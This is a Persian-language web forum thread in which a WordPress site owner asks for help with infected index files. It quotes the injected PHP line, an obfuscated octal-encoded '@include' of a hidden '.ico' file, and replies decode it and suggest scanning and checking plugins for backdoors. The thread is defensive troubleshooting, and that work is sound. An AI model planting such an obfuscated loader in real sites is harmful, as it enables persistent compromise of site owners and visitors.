سوال و راهنمایی در مورد فایل های ویروسی وب سایت وردپرسی
یه سایتی هست که تقریبا تمام فایل های ایندکس اون اولش یه همچین کدهایی اضافه شده .
دوستان و بزرگواران در این زمینه تجربه یا اطلاعی دارن؟کد PHP:
/*658df*/
@include "\057h\157m\145/\152e\146t\150e\165j\057p\165b\154i\143_\150t\155l\0154o\143k\163/\166e\162s\145/\056b\0718\1445\1460\060.\151c\157";
/*658df*/
پاسخ : سوال و راهنمایی در مورد فایل های ویروسی وب سایت وردپرسی
انکود شده Hex
خروجی دیکد شده این کد شما :
اما اینکه چرا در همه فایلها هست، نیاز به بررسی داره که خودتون میتونید انجام بدید.کد:/home/jeftheuj/public_html 4ocks/verse/.b98d5f00.ico
این ترکیبی از کاراکترهای استاندارد و ASCII اکتال هست. که مثلا شماره 057 که داخل کد شما هست، نمایانگر اسلش / هست و 157 نمایانگر حرف O
اطلاعات در خصوص Regex تو PHP ( لینک )
سایت روی هاست اشتراکی هست یا سرور اختصاصی و مجازی و ...؟
اگر دسترسی روت دارید، یکسری از توابع PHP رو باید غیرفعال کنید.
یه اسکن هم لازم هست در کل.
اگر که سایت وردپرس هست، نیاز دارید پلاگینها رو چک کنید و ببینید پلاگین یا پوستهای بک دور داره یا نه.
پاسخ : سوال و راهنمایی در مورد فایل های ویروسی وب سایت وردپرسی
نوشته اصلی توسط sam_pontiac
ممنون و سپاسگزارم بابت راهنمایی تون .
بله دسترسی هاست دارم .
دقیقا چه توابعی رو باید غیرفعال کنم ؟اگر دسترسی روت دارید، یکسری از توابع PHP رو باید غیرفعال کنید.
دقیقا با چی باید اسکن کنم ؟یه اسکن هم لازم هست در کل.
چطور میشه این مورد رو تشخیص داد که بک دور داره یا نه ؟نیاز دارید پلاگینها رو چک کنید و ببینید پلاگین یا پوستهای بک دور داره یا نه.
پاسخ : سوال و راهنمایی در مورد فایل های ویروسی وب سایت وردپرسی
سلام
یه سری از سایت ها هستند که اسکن قالب و پلاگین ها رو برای ویروسی بودنشون انجام میدن.
آیا میشه به اون سایتا اعتماد کرد و این جور کد ها رو هم برسی میکنن؟
در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)
مجوز های ارسال و ویرایش
پاسخ با نقل قول